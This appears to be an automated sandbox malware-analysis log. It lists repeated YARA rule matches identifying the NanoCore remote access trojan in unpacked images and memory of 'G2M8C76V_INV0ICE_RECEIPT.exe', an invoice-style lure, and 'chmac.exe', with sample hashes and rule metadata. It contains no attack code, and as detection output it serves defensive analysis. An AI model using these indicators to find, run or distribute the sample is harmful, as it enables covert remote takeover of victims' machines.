Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.0.chmac.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.0.chmac.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.0.chmac.exe.415058.9.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.0.chmac.exe.415058.9.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 15.2.chmac.exe.2551458.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 15.2.chmac.exe.2551458.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.0.chmac.exe.415058.7.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.0.chmac.exe.415058.7.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.2.chmac.exe.395c01e.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.2.chmac.exe.395c01e.7.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.7.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.7.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.2.chmac.exe.37b0e54.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.2.chmac.exe.3733258.5.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.2.chmac.exe.3733258.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.2.chmac.exe.415058.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.2.chmac.exe.415058.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.2.chmac.exe.415058.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.2.chmac.exe.415058.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.2.chmac.exe.396547d.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.2.chmac.exe.38e3258.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.2.chmac.exe.38e3258.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.1.chmac.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.1.chmac.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.0.chmac.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.0.chmac.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.2.chmac.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.2.chmac.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.9.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.9.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.0.chmac.exe.415058.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.0.chmac.exe.415058.9.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.0.chmac.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.0.chmac.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.0.chmac.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.0.chmac.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.0.chmac.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.0.chmac.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.0.chmac.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.0.chmac.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.2.chmac.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.2.chmac.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.0.chmac.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 16.0.chmac.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.0.chmac.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.0.chmac.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 15.2.chmac.exe.2540000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 15.2.chmac.exe.2540000.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000E.00000002.341257135.0000000003731000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000E.00000002.341257135.0000000003731000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000E.00000000.322700795.0000000000414000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000E.00000000.322700795.0000000000414000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000E.00000000.323810648.0000000000414000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000E.00000000.323810648.0000000000414000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000002.359331974.00000000024B0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000010.00000002.359331974.00000000024B0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.327158537.0000000003000000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000002.327158537.0000000003000000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000002.358998677.0000000000644000.00000004.00000020.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000010.00000002.358998677.0000000000644000.00000004.00000020.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000E.00000002.341406619.0000000004832000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000E.00000002.341406619.0000000004832000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000E.00000002.341081024.0000000002260000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000E.00000002.341081024.0000000002260000.00000004.00020000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000000.339547057.0000000000414000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000010.00000000.339547057.0000000000414000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000F.00000002.344485087.0000000002540000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000F.00000002.344485087.0000000002540000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000E.00000002.340666322.00000000004F4000.00000004.00000020.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000E.00000002.340666322.00000000004F4000.00000004.00000020.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000001.342024233.0000000000414000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000010.00000001.342024233.0000000000414000.00000040.00020000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000003.00000001.294779978.0000000000414000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000001.294779978.0000000000414000.00000040.00020000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000002.359590843.00000000038E1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000010.00000002.359590843.00000000038E1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000000.341018876.0000000000414000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000010.00000000.341018876.0000000000414000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.297135620.00000000030A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.297135620.00000000030A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000E.00000002.340553109.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000E.00000002.340553109.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000002.359549562.00000000028EE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000002.358899493.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000010.00000002.358899493.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000002.359622615.000000000391A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000E.00000002.341299575.000000000376A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000003.00000000.293187290.0000000000414000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000000.293187290.0000000000414000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000E.00000002.341227508.000000000273E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000003.00000000.294042312.0000000000414000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000000.294042312.0000000000414000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000002.359413916.0000000002502000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000010.00000002.359413916.0000000002502000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000E.00000001.325215386.0000000000414000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000E.00000001.325215386.0000000000414000.00000040.00020000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: G2M8C76V_INV0ICE_RECEIPT.exe PID: 6964, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: G2M8C76V_INV0ICE_RECEIPT.exe PID: 6964, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: G2M8C76V_INV0ICE_RECEIPT.exe PID: 7092, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: G2M8C76V_INV0ICE_RECEIPT.exe PID: 7092, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: chmac.exe PID: 6288, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: chmac.exe PID: 6288, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: chmac.exe PID: 6556, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: chmac.exe PID: 6556, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: chmac.exe PID: 6760, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: chmac.exe PID: 6760, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: chmac.exe PID: 6820, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: chmac.exe PID: 6820, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>

Source: G2M8C76V_INV0ICE_RECEIPT.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 16.2.chmac.exe.2906888.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 16.2.chmac.exe.2906888.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.2.chmac.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.2.chmac.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.2.chmac.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.0.chmac.exe.415058.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.0.chmac.exe.415058.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.0.chmac.exe.415058.7.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.0.chmac.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.0.chmac.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.0.chmac.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.2.chmac.exe.38e3258.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 16.2.chmac.exe.38e3258.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.2.chmac.exe.38e3258.6.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.0.chmac.exe.415058.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 16.0.chmac.exe.415058.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.0.chmac.exe.415058.9.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.0.chmac.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.0.chmac.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.0.chmac.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.0.chmac.exe.415058.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 16.0.chmac.exe.415058.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.0.chmac.exe.415058.9.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.0.chmac.exe.415058.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 16.0.chmac.exe.415058.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.0.chmac.exe.415058.7.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.0.chmac.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 16.0.chmac.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.0.chmac.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.2.chmac.exe.4830000.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.2.chmac.exe.4830000.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.2.chmac.exe.4830000.9.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
